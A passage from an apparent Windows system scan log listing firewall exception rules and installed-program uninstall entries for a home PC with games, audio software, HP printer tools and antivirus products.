"{377610C4-B60C-446B-9DE0-087F154E16E9}" = protocol=17 | dir=in | app=c:\udk\udk-2013-02\binaries\win32\udk.exe |
"{37A6F582-637B-48F7-95DE-8F8EDF6A112F}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe |
"{392DA784-24A1-417C-84CA-A6725D311356}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgemca.exe |
"{3A05F0B2-B7B4-4125-B2B3-8C3F99E10188}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgnsa.exe |
"{42B9F85B-63A4-4EE0-BF82-52DAEF684FD5}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe |
"{436A9397-DF42-48D3-AE1F-B983375F514A}" = protocol=1 | dir=in | [email protected],-28543 |
"{436E3AF5-6085-4FFE-890A-9AD756CC8811}" = protocol=58 | dir=in | [email protected],-28545 |
"{43880E4E-D85E-4821-9943-4FB5677D8EB3}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgnsa.exe |
"{487E5630-8280-4CC2-86EA-A0C4A1C8EA15}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{48EF0E9A-9E8F-4F5D-BAD7-F441B9B57CB1}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\specops_theline\binaries\win32\specopstheline.exe |
"{4B6622C2-EA92-4EAC-8B1B-5A34D4314E2B}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock 2\mp\builds\binaries\bioshock2launcher.exe |
"{4D8F8646-276B-48A0-8326-A340F8A9BEA3}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock 2\sp\builds\binaries\bioshock2launcher.exe |
"{4E05B2C6-9779-427D-B17D-D035DEFB10C9}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqtra08.exe |
"{506A2EE1-3801-455C-9B13-4F1C4B591548}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgdiagex.exe |
"{51B54F6B-EA4A-49AB-95EC-9D3D7EA90F38}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe |
"{51FBD7B6-E253-41B9-8CBA-1EB6AD532609}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{57993C5C-B0A1-4D24-8ED2-0D6B819FCBBE}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock\builds\release\bioshock.exe |
"{5A04CB64-C693-4282-9B24-78F5EA20EEBB}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{5D0F0A41-ED85-4AA9-B369-103FD5397CD8}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgmfapx.exe |
"{5F097039-13B1-45BE-AF1C-4C9A2754A307}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{6435CD38-1FA7-4509-A4B1-85191F6A79F1}" = protocol=6 | dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{6CE7CE11-52CA-4827-918F-459F061A9E03}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqusgm.exe |
"{6F12DFC7-30DC-4809-98DC-DC25ABC327A3}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{72463540-7DD4-4617-A787-0CE3E8D25510}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{7B3F996C-235C-4846-A3A8-04989C947D27}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{7D7F1AC4-5DDA-436C-8917-757A5BD5BC05}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{7DD745A0-5102-45AF-98AA-C8E231C4947E}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{84639E2C-A7E7-4BB0-A33D-8EC4EF038F10}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{8706E0F8-B04D-4372-AC8A-0EC3BCDE4B68}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqkygrp.exe |
"{879A3A02-2A00-462C-AE58-104E214B3CDB}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgnsa.exe |
"{87AEFDF2-BA84-4022-9A0A-34E85B2D4D2C}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock 2\mp\builds\binaries\bioshock2launcher.exe |
"{8ACDAE34-1072-44CE-9F93-A88457CF9526}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgdiagex.exe |
"{8B08B3A2-B710-4CA8-AA39-4F87F6BCCD8F}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{8D2F3C00-DCB3-49CA-AEEC-957D3E8FA73D}" = dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{9266290E-FBEA-4796-BF8D-496DBEF67912}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terraria.exe |
"{94E45DA4-DFEF-4D4F-9BF4-31B1F85858AC}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\specops_theline\binaries\win32\specopstheline.exe |
"{99301C6E-E690-42C9-AA57-3115F184D9B8}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{9A735FBA-1DDD-42E4-B5A4-94845F7E0A76}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe |
"{9BD17BCC-CA47-4F6D-B834-CCF6E8B8047C}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{9DA440E1-8A09-4D84-B43C-77B4F72293B2}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpofxs08.exe |
"{9DFC7EEF-BCB1-4A6E-A42E-0347AFC466D1}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpoews01.exe |
"{A4ED0307-A44B-4EDA-94BF-E90401A7ADA2}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{A689F259-4A0C-4DB2-B8F1-1D46953BD1ED}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgemca.exe |
"{A7A76560-0B4F-4511-BB1D-46B97E9A7B62}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terraria.exe |
"{A8075963-95A9-4CE5-93EC-5B8015776203}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{B9350A14-AFB9-44F4-A538-761ACE3CFB9B}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpzwiz01.exe |
"{BE634C7A-A0AC-4299-B96E-BC314ADA0DBD}" = protocol=17 | dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{C1D4E60F-DF8E-4383-81D1-552B2979A2DE}" = dir=in | app=c:\program files\belkin\belkin usb print and storage center\connect.exe |
"{C4AE5787-1CA8-49C2-B0C2-0A80A244F574}" = protocol=17 | dir=in | app=c:\users\cochran\appdata\roaming\utorrent\utorrent.exe |
"{C526F726-0A28-4487-B7F2-A325637771BA}" = protocol=58 | dir=out | [email protected],-503 |
"{C53218C9-275F-4074-972C-6869B8AB361F}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock 2\sp\builds\binaries\bioshock2launcher.exe |
"{C66955FD-DBC0-4C59-88B8-5E472F6B1999}" = protocol=17 | dir=in | app=c:\program files\java\jre7\bin\javaw.exe |
"{CAED9D9F-DC79-452C-8F96-7A4217AFCF03}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{CB8371BA-2B04-4A43-8155-8A72ECD178D4}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{CBC3EA5C-B046-44DB-9A6C-372D0B5A80FE}" = protocol=17 | dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{CE548A16-B694-4540-A277-86F890D8018D}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgdiagex.exe |
"{D04A221A-C680-441C-A789-89232DDDE5A8}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{D2CF5FAE-68F6-480A-A273-FEC5D150993B}" = dir=in | app=c:\program files (x86)\hp\hp software update\hpwucli.exe |
"{D3EF6A45-C95C-4C88-A1C1-117F0BDD6BA9}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe |
"{D701A41A-F213-409D-9567-DA754E97E014}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock\builds\release\bioshock.exe |
"{D73D7CAB-71C2-42A4-B1B8-4D1E5BDD4276}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgmfapx.exe |
"{E6CB6C65-7DFF-4DD3-B2BB-10C1B3C5C3B2}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpfccopy.exe |
"{E76300C6-BA5C-4A0A-9995-0CAF44C86987}" = protocol=17 | dir=in | app=c:\program files (x86)\realtek\11n usb wireless lan utility\rtwlan.exe |
"{EC85E556-439B-4543-B22C-157961729B97}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe |
"{EF501551-CFF4-4BDC-B0DC-7134731E73B6}" = protocol=6 | dir=in | app=c:\program files (x86)\belkin\router setup and monitor\belkinsetup.exe |
"{F1DAD188-F962-4283-BB6F-5CA5C249CF62}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{F4F6EEF2-6084-4C1F-A6A7-960073C275AC}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqgpc01.exe |
"{FB4DA1D9-C461-4686-BFB8-14504CD52C4E}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpiscnapp.exe |
"{FF01A1AB-48AA-453A-BD6B-A2665FCB72CD}" = protocol=6 | dir=out | app=system |
"{FFA38349-2E0B-4F00-BC4F-FE0A467EDB17}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\resident evil revelations\rerev.exe |
"TCP Query User{3802FE4E-DE09-4645-A203-7F9E15A82858}C:\program files\java\jre7\bin\javaw.exe" = protocol=6 | dir=in | app=c:\program files\java\jre7\bin\javaw.exe |
"TCP Query User{E10065EB-D119-437D-B9D0-43A9224074D9}C:\program files (x86)\ea games\dead space 2\deadspace2.exe" = protocol=6 | dir=in | app=c:\program files (x86)\ea games\dead space 2\deadspace2.exe |
"TCP Query User{F08758BF-4903-4BFB-B15A-B3889F97ADED}C:\program files (x86)\unity\editor\unity.exe" = protocol=6 | dir=in | app=c:\program files (x86)\unity\editor\unity.exe |
"UDP Query User{69F3CAE0-816B-4996-A61F-4A23B76B96EE}C:\program files\java\jre7\bin\javaw.exe" = protocol=17 | dir=in | app=c:\program files\java\jre7\bin\javaw.exe |
"UDP Query User{9B97057C-B7AB-44A1-9079-EBBC0B5216F0}C:\program files (x86)\unity\editor\unity.exe" = protocol=17 | dir=in | app=c:\program files (x86)\unity\editor\unity.exe |
"UDP Query User{DC623097-0454-4FBD-A0AE-9293F96A4A5D}C:\program files (x86)\ea games\dead space 2\deadspace2.exe" = protocol=17 | dir=in | app=c:\program files (x86)\ea games\dead space 2\deadspace2.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0B8565BA-BAD5-4732-B122-5FD78EFC50A9}" = Native Instruments Service Center
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{21B133D6-5979-47F0-BE1C-F6A6B304693F}" = Visual Studio 2010 x64 Redistributables
"{23170F69-40C1-2702-0920-000001000000}" = 7-Zip 9.20 (x64 edition)
"{26A24AE4-039D-4CA4-87B4-2F86417011FF}" = Java 7 Update 11 (64-bit)
"{330DAC67-5B62-452A-A0E4-6B4A5923940F}_is1" = MotioninJoy Gamepad tool 0.7.1001
"{491DF203-7B61-4F0E-BDCB-A1218C4DAFE9}" = Native Instruments Massive
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{55D55008-E5F6-47D6-B16F-B2A40D4D145F}" = 64 Bit HP CIO Components Installer
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6965A8D2-465D-4F98-9FAA-0E9E2348F329}" = Microsoft LifeCam
"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{787136D2-F0F8-4625-AA3F-72D7795AC842}" = Apple Mobile Device Support
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{81E20D41-C277-4526-934D-F2380AF91B78}" = iCloud
"{886e7ed9-3a61-449c-8152-4192f681466b}" = Native Instruments Skanner XT
"{8C775E70-A791-4DA8-BCC3-6AB7136F4484}" = Visual Studio 2012 x64 Redistributables
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9C5A08BF-BB99-4998-81BD-F6CC32483B34}" = Microsoft Corporation
"{9D3BAEFB-5DDD-43D4-8BB2-D9989521F003}" = Native Instruments Razor
"{A4DDB2AB-ECCD-4C3A-8633-77D5A1A0E542}" = Network64
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision" = NVIDIA 3D Vision Driver 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB" = NVIDIA 3D Vision Controller Driver 280.19
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update" = NVIDIA Update 1.11.3
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver" = NVIDIA HD Audio Driver 1.2.23.3
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components
"{B52530CA-2C06-447D-B54D-CD6DBF91C9EE}" = AVG 2014
"{B8BA155B-1E75-405F-9CB4-8A99615D09DC}" = iTunes
"{BFAE8D5B-F918-486F-B74E-90762DF11C5C}" = Microsoft Security Client
"{CB21CD89-A4D3-4240-9AAA-55DCE7F3D076}" = AVG 2014
"{CE52672C-A0E9-4450-8875-88A221D5CD50}" = Windows Live ID Sign-in Assistant
"{E5083D57-D93F-404C-A91F-1C50D67C2BEB}" = HP Officejet 4500 G510g-m
"{E5D0E503-AAA5-CE4D-34BA-6D24FEC1BEFC}" = AMD Catalyst Install Manager
"{E9EA5F38-6299-45A1-9D23-F21729A19357}" = Native Instruments Reaktor 5
"{F842F8B0-6942-4930-821F-543E976B2C66}" = MSVCRT110_amd64
"94C2CBCEB09487955736DC003D83210FA0D9F021" = Windows Driver Package - Realtek (RTL8167) Net  (06/10/2011 7.046.0610.2011)
"AVG" = AVG 2014
"Belkin USB Print and Storage Center" = Belkin USB Print and Storage Center
"Blender" = Blender
"HP Document Manager" = HP Document Manager 2.0
"HP Imaging Device Functions" = HP Imaging Device Functions 13.0
"HP Smart Web Printing" = HP Smart Web Printing 4.5
"HP Solution Center & Imaging Support Tools" = HP Solution Center 13.0
"HPExtendedCapabilities" = HP Customer Participation Program 13.0
"HPOCR" = OCR Software by I.R.I.S. 13.0
"McAfee Security Scan" = McAfee Security Scan Plus
"Microsoft Security Client" = Microsoft Security Essentials
"Pen Tablet Driver" = Wacom
"Shop for HP Supplies" = Shop for HP Supplies
"UDK-20d600fe-2caf-4677-828a-2fab27292871" = Unreal Development Kit: 2013-02
"UVI Workstation x64_is1" = UVI Workstation x64 2.0.7
"Wacom WebTabletPlugin for Internet Explorer and Netscape" = WebTablet FB Plugin 64 bit
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{007F778D-F15C-4EAB-AE92-071D21FAF632}" = Adobe Photoshop Elements 9
"{00C5F4F4-62F9-40D7-8000-AD8A9CD0C669}" = Microsoft Games for Windows - LIVE Redistributable
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{08D2E121-7F6A-43EB-97FD-629B44903403}" = Microsoft_VC90_CRT_x86
"{0F367CA3-3B2F-43F9-A44A-25A8EE69E45D}" = Scan
"{1057511B-F8FE-4230-9ED3-AB949A57EE4A}" = Windows Live PIMT Platform
"{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}" = Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
"{14DC0059-00F1-4F62-BD1A-AB23CD51A95E}" = Adobe AIR
"{175F0111-2968-4935-8F70-33108C6A4DE3}" = MarketResearch
"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer
"{185F9795-9663-4F13-9EF9-307A282ADB5A}" = ph
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F7FB68F-52F6-46A3-B42F-38CE46295AE5}" = Nero MediaHub 10
"{20D4A895-748C-4D88-871C-FDB1695B0169}" = Platform
"{21A2F5EE-1DC5-488A-BE7E-E526F8C61488}" = DeviceDiscovery
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer
"{237CCB62-8454-43E3-B158-3ACD0134852E}" = High-Definition Video Playback 10
"{2436F2A8-4B7E-4B6C-AE4E-604C84AA6A4F}" = Nero Core Components 10
"{28379381-B56A-43e1-B505-3098D82B1C30}" = 4500G510gm_Software_Min
"{29315CEC-E6CE-4394-84DC-6F862E8D9A52}" = Windows Live UX Platform
"{297DCADA-86A1-4A42-8A13-66B7D7A09FD2}" = WeatherBug
"{2A075BB4-E976-4278-BF3F-E5C6945D84C0}" = bl
"{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}" = Microsoft XNA Framework Redistributable 4.0
"{2C9EE786-1DDB-4C98-8FA4-B1B9B5A66B77}" = Microsoft Games for Windows - LIVE
"{2D416A80-0BB1-4D8B-B770-7BE8F53D5937}" = Windows Live UX Platform Language Pack
"{2EEA7AA4-C203-4b90-A34F-19FB7EF1C81C}" = BufferChm
"{30FD541D-3C9D-41C4-B240-A994EE4E0231}" = Adobe Audition CS6
"{329411A0-19F3-4740-874F-17400B126F27}" = Nero Vision 10 Help (CHM)
"{40F55150-F43D-4C9F-9A00-1A0A6F1EB7F0}" = Movie Maker
"{433EACD8-4747-4A6A-826A-FFA9F39B0D40}" = Elements 9 Organizer
"{43CDF946-F5D9-4292-B006-BA0D92013021}" = WebReg
"{440B915A-0C85-45DB-92AE-75AE14704A64}" = Fax
"{46316411-80D8-4F68-8118-696E05FCE199}" = Windows Live Essentials
"{4817D846-700B-474E-A31B-80892B3E92E3}" = Adobe After Effects CS6
"{4A70EF07-7F88-4434-BB61-D1DE8AE93DD4}" = SolutionCenter
"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.11
"{4F9A382F-4478-4036-905C-F77DF2EA0370}" = Windows Live SOXE
"{4FA8F084-C42F-45E1-B7E5-E0C8A1083DC5}" = Windows Live SOXE Definitions
"{51C7AD07-C3F6-4635-8E8A-231306D810FE}" = Cisco LEAP Module
"{523B2B1B-D8DB-4B41-90FF-C4D799E2758A}" = Nero ControlCenter 10 Help (CHM)
"{5CC4C963-F772-4766-BFF2-DE551E205EE9}" = Photo Common
"{5E21B617-F52E-BB10-92F9-C8AB2C799A8A}" = Adobe Download Assistant
"{6037B8AD-7D5B-4D50-9BCA-A586C44EEF34}" = Ace of Spades
"{60A1253C-2D51-4166-95C2-52E9CF4F8D64}" = Photo Gallery
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{63AA3EAB-23BB-48B2-9AD0-44F878075604}" = Nero 10 Menu TemplatePack Basic
"{63FF21C9-A810-464F-B60A-3111747B1A6D}" = GPBaseService2
"{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}" = Cisco EAP-FAST Module
"{64DF7404-9D46-44AF-AFA1-A2F8D5648C2D}" = Windows Live Photo Common
"{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}" = Nero Update
"{68A10D12-0D0F-4212-BDE6-D87FAD32A8FA}" = SmartWebPrinting
"{6B2FFB21-AC88-45C3-9A7D-4BB3E744EC91}" = HPSSupply
"{6BBA26E9-AB03-4FE7-831A-3535584CA002}" = Toolbox
"{6DFB899F-17A2-48F0-A533-ED8D6866CF38}" = Nero Control Center 10
"{7059BDA7-E1DB-442C-B7A1-6144596720A4}" = HP Update
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}" = Adobe Photoshop CS6
"{76EE8FE7-1957-4C51-9074-4930A8CFB1AF}" = Windows Live Installer
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{8D8024F1-2945-49A5-9B78-5AB7B11D7942}_is1" = Auslogics Registry Cleaner
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8E14DDC8-EA60-4E18-B3E3-1937104D5BDA}" = MSVCRT110
"{8FE96B14-E1F9-47BF-8BA1-A81467CD259B}_is1" = Yawcam 0.3.8
"{90DFD61B-8224-00C6-3D69-A983B60A394E}" = Bamboo Dock
"{92A51949-EE4C-466D-AAF0-99E74A49A63F}" = DocMgr
"{92D58719-BBC1-4CC3-A08B-56C9E884CC2C}" = Microsoft_VC80_CRT_x86
"{94358C28-335B-4E43-BC4E-C59576BAB653}" = ASPCA Reminder by We-Care.com v4.0.16.1
"{94D7C8B5-E61B-431F-BFF6-08E0B2BD609C}" = PowerInbox
"{96D06FDD-6AF4-4309-BC1B-1C9588B0575E}" = Dead Space™ 2
"{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}" = Visual Studio 2012 x86 Redistributables
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9A4297F3-2A51-4ED9-92CA-4BCB8380947E}" = Nero Vision 10
"{9B2E55F8-5BA8-4A45-9682-ACB6F2CC0DA5}" = Photo Gallery
"{9B362566-EC1B-4700-BB9C-EC661BDE2175}" = DocProc
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9C049499-055C-4a0c-A916-1D12314F45EB}" = REALTEK Wireless LAN Driver and Utility
"{9E549410-E417-4672-96E1-607E061AE69D}" = Nero VisionXtra Trial
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}" = Apple Application Support
"{AC1BFC52-016B-4F2A-8604-C9F1A0181F4C}_is1" = DREADOUT Demo
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.02)
"{AE8705FB-E13C-40A9-8A2D-68D6733FBFC2}" = Status
"{AF37176A-78CA-545B-34EF-8B6A21514DD1}" = Adobe Help Manager
"{B3BC9DB1-0B0A-48B0-B86B-EA77CAA7F800}" = Microsoft Corporation
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1" = Spybot - Search & Destroy
"{BA73469B-D8C7-4FE3-B33C-1340D09F0709}" = Windows Live Communications Platform
"{BB285C9F-C821-4770-8970-56C4AB52C87E}" = Skype Click to Call
"{BD5669B5-49FF-4490-B956-E9D7CB9B0ADC}" = Adobe Flash Professional CS6
"{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}" = Destinations
"{BE0D4271-69C9-4f28-AD9B-BB33D126A30E}" = 4500G510gm
"{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}" = PDF Settings CS6
"{C0C31BCC-56FB-42a7-8766-D29E1BD74C7C}" = Python 2.7.3
"{C43326F5-F135-4551-8270-7F7ABA0462E1}" = HPProductAssistant
"{ce085a78-074e-4823-8dc1-8a721b94b76d}" = Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005
"{D1A19B02-817E-4296-A45B-07853FD74D57}" = Microsoft_VC80_MFC_x86
"{D71BC54E-A4E6-4E06-866C-FD6EE16EA187}" = Movie Maker
"{D92BBB52-82FF-42ED-8A3C-4E062F944AB7}" = Microsoft_VC80_MFCLOC_x86
"{D9F75285-4864-461D-83DA-8D056BAC44D1}" = Google Drive
"{DC0A5F99-FD66-433F-9D3A-05DCBA64BE42}" = TrayApp
"{DF0B357C-5874-47D0-81E7-79AA890B0CE0}" = 4500_G510gm_Help
"{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1" = Auslogics Disk Defrag
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E2AE009D-37E5-4724-A6B8-0ED6A6BA4F68}" = Elements STI Installer
"{E5F05232-96B6-4552-A480-785A60A94B21}" = System Requirements Lab CYRI
"{EC8282AB-48DD-91D2-7387-01CD6E100A5D}" = Adobe Photoshop.com Inspiration Browser
"{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}" = Cisco PEAP Module
"{F03117FA-9270-46B0-9666-0B4BC2CDEBF5}" = Visual C++ Redistributables
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F1D34C1C-9C2A-4932-BE14-7B641A4D53E9}" = NETGEAR WNA1100 wireless USB 2.0 driver
"{F467862A-D9CA-47ED-8D81-B4B3C9399272}" = Nero MediaHub 10 Help (CHM)
"{F5CB822F-B365-43D1-BCC0-4FDA1A2017A7}" = Nero 10 Movie ThemePack Basic
"{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}" = Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
"{F96D619D-99D6-4C9C-A393-0CD22DE1CA66}_is1" = Ezvid
"{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}" = Visual Studio 2008 x64 Redistributables
"Acoustica Mixcraft 6" = Acoustica Mixcraft 6
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 13 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 13 Plugin
"Adobe Photoshop Elements 9" = Adobe Photoshop Elements 9
"Adobe Shockwave Player" = Adobe Shockwave Player 12.1
"ASIO4ALL" = ASIO4ALL
"Audacity_is1" = Audacity 2.0.2
"Bamboo Dock" = Bamboo Dock
"Belkin Setup and Router Monitor_is1" = Belkin Setup and Router Monitor
"blekkotb_026" = blekko search bar
"Camel Audio CamelCrusher64" = Camel Audio CamelCrusher64
"chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1" = Adobe Help Manager
"Cheat Engine 6.2_is1" = Cheat Engine 6.2
"com.adobe.downloadassistant.AdobeDownloadAssistant" = Adobe Download Assistant
"DAEMON Tools Lite" = DAEMON Tools Lite
"daHornet VSTi V1.34_is1" = daHornet Version 1.34
"Deckadance" = Deckadance
"Desura" = Desura
"FL Studio 10" = FL Studio 10
"Fraps" = Fraps (remove only)
"GoldWave v5.67" = GoldWave v5.67
"Google Chrome" = Google Chrome
"IL Download Manager" = IL Download Manager
"IL Shared Libraries" = IL Shared Libraries
"ImgBurn" = ImgBurn
"Inkscape" = Inkscape 0.48.2
"InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}" = VIA Platform Device Manager
"InstallShield_{F03117FA-9270-46B0-9666-0B4BC2CDEBF5}" = Visual C++ Redistributables
"Mozilla Firefox 29.0.1 (x86 en-US)" = Mozilla Firefox 29.0.1 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Native Instruments Massive" = Native Instruments Massive
"Native Instruments Razor" = Native Instruments Razor
"Native Instruments Reaktor 5" = Native Instruments Reaktor 5
"Native Instruments Service Center" = Native Instruments Service Center
"Native Instruments Skanner XT" = Native Instruments Skanner XT
"Notepad++" = Notepad++
"NSS" = Norton Security Scan
"NVIDIA StereoUSB Driver" = NVIDIA 3D Vision Controller Driver
"NVIDIAStereo" = NVIDIA Stereoscopic 3D Driver
"pcsx2-r5875" = PCSX2 - Playstation 2 Emulator
"PhotoshopdotcomInspirationBrowser.4C35C4D325D350FE0114230CBADCA2DDD0AC8D25.1" = Adobe Photoshop.com Inspiration Browser
"PhotoStage" = PhotoStage Slideshow Producer
"PowerISO" = PowerISO
"PureLeads" = PureLeads
"Razer Game Booster_is1" = Razer Game Booster
"rgcAudio z3ta Plus v1.40" = rgcAudio z3ta Plus v1.40
